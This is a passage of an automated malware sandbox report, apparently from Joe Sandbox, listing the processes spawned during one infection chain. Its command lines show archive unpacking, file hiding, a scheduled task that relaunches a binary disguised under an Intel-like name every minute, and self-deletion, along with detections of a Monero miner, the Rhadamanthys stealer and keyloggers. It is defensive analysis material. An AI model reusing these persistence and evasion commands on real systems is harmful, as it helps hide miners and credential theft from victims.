                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                              Imagebase:0x7ff7c1740000
                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:10
                                                                                                                                                              Start time:05:47:24
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:high
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:11
                                                                                                                                                              Start time:05:47:24
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\mode.com
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:mode 65,10
                                                                                                                                                              Imagebase:0x7ff75f780000
                                                                                                                                                              File size:33'280 bytes
                                                                                                                                                              MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:12
                                                                                                                                                              Start time:05:47:24
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:13
                                                                                                                                                              Start time:05:47:25
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:14
                                                                                                                                                              Start time:05:47:25
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:15
                                                                                                                                                              Start time:05:47:25
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Reputation:moderate
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:16
                                                                                                                                                              Start time:05:47:25
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:17
                                                                                                                                                              Start time:05:47:25
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:18
                                                                                                                                                              Start time:05:47:25
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:19
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                              Imagebase:0x790000
                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:20
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:attrib +H "in.exe"
                                                                                                                                                              Imagebase:0x7ff7e4ee0000
                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:21
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"in.exe"
                                                                                                                                                              Imagebase:0x7ff7d4a50000
                                                                                                                                                              File size:1'827'328 bytes
                                                                                                                                                              MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:22
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                              Imagebase:0x7ff7e4ee0000
                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:23
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                              Imagebase:0x7ff7e4ee0000
                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:24
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:25
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\schtasks.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
                                                                                                                                                              Imagebase:0x7ff7c57f0000
                                                                                                                                                              File size:235'008 bytes
                                                                                                                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:26
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:27
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:powershell ping 127.0.0.1; del in.exe
                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:28
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:29
                                                                                                                                                              Start time:05:47:26
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:30
                                                                                                                                                              Start time:05:47:27
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\system32\PING.EXE" 127.0.0.1
                                                                                                                                                              Imagebase:0x7ff63e6f0000
                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:31
                                                                                                                                                              Start time:05:47:28
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe
                                                                                                                                                              Imagebase:0x7ff7f5ec0000
                                                                                                                                                              File size:1'827'328 bytes
                                                                                                                                                              MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                              • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 0000001F.00000003.2785095073.00000261B8C20000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              • Detection: 67%, ReversingLabs
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:32
                                                                                                                                                              Start time:05:47:28
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:explorer.exe
                                                                                                                                                              Imagebase:0x7ff609140000
                                                                                                                                                              File size:5'141'208 bytes
                                                                                                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000020.00000002.2790543601.0000000000782000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000020.00000002.2791427646.000000014040B000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000020.00000002.2791286176.00000001402DD000.00000002.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000020.00000002.2790543601.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000020.00000002.2790543601.0000000000737000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:33
                                                                                                                                                              Start time:05:47:28
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe
                                                                                                                                                              Imagebase:0x7ff6e3d50000
                                                                                                                                                              File size:452'608 bytes
                                                                                                                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:34
                                                                                                                                                              Start time:05:47:28
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:35
                                                                                                                                                              Start time:05:47:29
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\PING.EXE
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Windows\system32\PING.EXE" 127.1.10.1
                                                                                                                                                              Imagebase:0x7ff63e6f0000
                                                                                                                                                              File size:22'528 bytes
                                                                                                                                                              MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:36
                                                                                                                                                              Start time:05:47:29
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1016876001\d7691cd336.exe"
                                                                                                                                                              Imagebase:0x610000
                                                                                                                                                              File size:1'960'448 bytes
                                                                                                                                                              MD5 hash:914BC5E4CA51B1218F63A8539614DCBC
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000024.00000003.2816649342.0000000004EF0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000024.00000003.2813486090.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000024.00000003.2816838324.0000000005110000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000024.00000003.2818001314.00000000049F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:37
                                                                                                                                                              Start time:05:47:32
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Windows\System32\svchost.exe"
                                                                                                                                                              Imagebase:0xf10000
                                                                                                                                                              File size:46'504 bytes
                                                                                                                                                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000025.00000002.2838016524.0000000003200000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000025.00000003.2822637005.0000000005300000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 00000025.00000003.2817891813.00000000009D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000025.00000003.2821727826.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:40
                                                                                                                                                              Start time:05:47:32
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6316 -s 656
                                                                                                                                                              Imagebase:0x220000
                                                                                                                                                              File size:483'680 bytes
                                                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:41
                                                                                                                                                              Start time:05:47:36
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe"
                                                                                                                                                              Imagebase:0xf30000
                                                                                                                                                              File size:765'568 bytes
                                                                                                                                                              MD5 hash:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 75%, ReversingLabs
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:42
                                                                                                                                                              Start time:05:47:36
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:43
                                                                                                                                                              Start time:05:47:39
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1016877001\c5bc1413d7.exe"
                                                                                                                                                              Imagebase:0xf30000
                                                                                                                                                              File size:765'568 bytes
                                                                                                                                                              MD5 hash:8A9CB17C0224A01BD34B46495983C50A
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:44
                                                                                                                                                              Start time:05:47:48
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1016878001\5b3f6dd868.exe"
                                                                                                                                                              Imagebase:0x90000
                                                                                                                                                              File size:4'466'688 bytes
                                                                                                                                                              MD5 hash:3287CE2D6BE3F77C5D1E7CC351F4AD5F
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Antivirus matches:
                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:45
                                                                                                                                                              Start time:05:47:56
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe"
                                                                                                                                                              Imagebase:0xa80000
                                                                                                                                                              File size:776'832 bytes
                                                                                                                                                              MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:46
                                                                                                                                                              Start time:05:47:56
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                              Imagebase:0x7ff66e660000
                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:47
                                                                                                                                                              Start time:05:47:59
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe
                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe"
                                                                                                                                                              Imagebase:0xa80000
                                                                                                                                                              File size:776'832 bytes
                                                                                                                                                              MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Has exited:true

                                                                                                                                                              Target ID:48
                                                                                                                                                              Start time:05:47:59
                                                                                                                                                              Start date:18/12/2024
                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe
                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1016879001\f1e68d5060.exe"
                                                                                                                                                              Imagebase:0xa80000
                                                                                                                                                              File size:776'832 bytes
                                                                                                                                                              MD5 hash:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                              Yara matches:
                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000030.00000003.3302895820.0000000001332000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                              Has exited:false

                                                                                                                                                              Target ID:49
                                                                                                                                                              Start time:05:48:01
                                                                                                                                                              Start date:18/12/2024
